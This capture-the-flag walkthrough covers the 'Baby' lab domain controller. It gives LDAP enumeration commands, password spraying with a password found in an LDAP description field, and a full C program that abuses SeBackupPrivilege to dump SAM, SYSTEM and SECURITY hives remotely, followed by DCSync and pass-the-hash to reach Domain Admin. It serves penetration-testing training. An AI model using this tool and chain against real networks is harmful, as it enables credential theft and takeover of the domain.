🚼Baby
You will learn about LDAP enumeration & Windows privileges
IP: 10.10.117.218
Enumeration
This is a standalone machine
After the port scan, one thing we can do is enumerate LDAP with nmap's ldap scripts:
nmap -n -sV --script "ldap* and not brute" 10.10.117.218 -vv -oN nmap/ldapsearch -Pn
This gives us information about the domain, the machine name, the LDAP policies and the AD users.

Next we check whether anonymous LDAP bind is allowed; if it is, we can enumerate the users without any credentials:
ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl" "user" | grep cn

We now have a list of the users present in Active Directory.
If we remove the user argument from the command,
ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl"
we get every attribute of every object, including the description fields:

BabyStart123!
is probably the initial password set for this account, and maybe for others too.
We can build a list of users and spray this password against all of them.

It did not work.

Looking at the users again, we also find Caroline.Robinson, who for some reason has no userPrincipalName, so the earlier listing of users did not show her.

Spraying her account with crackmapexec returns STATUS_PASSWORD_MUST_CHANGE: the password is right, but it has to be changed before the account can be used.

We can use Impacket's smbpasswd.py to set a new password for her.

Privilege Escalation
Enumerating this user's privileges shows SeBackupPrivilege and SeRestorePrivilege, most likely because she is a member of the Backup Operators group.


With SeBackupPrivilege we can copy the SAM and SYSTEM hives, but the domain hashes live in ntds.dit, which is locked while the DC is running.

One way around that is a diskshadow script that creates a shadow copy of C: and exposes it as an E: drive, from which ntds.dit can be copied.

But for some unknown reason, after trying countless times, it did not work.
So I used this code to copy the different hives to C:\Windows\Temp:
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

#pragma comment(lib, "Advapi32.lib")

/* Log on with Caroline's credentials and impersonate the resulting token so
 * the remote registry connection below is made as a Backup Operator.
 * LOGON32_LOGON_NEW_CREDENTIALS only swaps the credentials used for
 * outbound network connections, which is all that is needed here. */
void MakeToken() {
    HANDLE token;
    const char username[] = "Caroline.Robinson";
    const char password[] = "Password123!";
    const char domain[] = "baby.vl";

    if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS,
                   LOGON32_PROVIDER_DEFAULT, &token) == 0) {
        printf("LogonUserA: %lu\n", GetLastError());
        exit(1);
    }
    if (ImpersonateLoggedOnUser(token) == 0) {
        printf("ImpersonateLoggedOnUser: %lu\n", GetLastError());
        exit(1);
    }
}

int main()
{
    HKEY hklm;
    HKEY hkey;
    LONG result;
    const char* hives[] = { "SAM", "SYSTEM", "SECURITY" };
    /* These paths are interpreted on the DC, not on the machine running this
     * tool: RegSaveKeyA on a remote key writes the file on the remote host. */
    const char* files[] = { "C:\\windows\\temp\\sam.hive",
                            "C:\\windows\\temp\\system.hive",
                            "C:\\windows\\temp\\security.hive" };

    /* Comment this out when already running as Caroline. */
    MakeToken();

    result = RegConnectRegistryA("\\\\baby.vl", HKEY_LOCAL_MACHINE, &hklm);
    if (result != ERROR_SUCCESS) {
        printf("RegConnectRegistryA: %ld\n", result);
        exit(1);
    }
    for (int i = 0; i < 3; i++) {
        printf("Dumping %s hive to %s\n", hives[i], files[i]);
        /* REG_OPTION_BACKUP_RESTORE opens the key with backup semantics: with
         * SeBackupPrivilege the key is granted KEY_READ regardless of its ACL. */
        result = RegOpenKeyExA(hklm, hives[i],
                               REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK,
                               KEY_READ, &hkey);
        if (result != ERROR_SUCCESS) {
            printf("RegOpenKeyExA: %ld\n", result);
            exit(1);
        }
        result = RegSaveKeyA(hkey, files[i], NULL);
        if (result != ERROR_SUCCESS) {
            printf("RegSaveKeyA: %ld\n", result);
            exit(1);
        }
        RegCloseKey(hkey);
    }
    RegCloseKey(hklm);
    return 0;
}

After retrieving the three files from the DC, the SYSTEM and SECURITY hives give us the NT hash of the machine account babydc$ (the $MACHINE.ACC LSA secret). A domain controller's machine account is allowed to replicate the directory, so with that hash we can DCSync the domain and recover the Administrator hash.

Then we log in as Administrator with that hash and we are DA.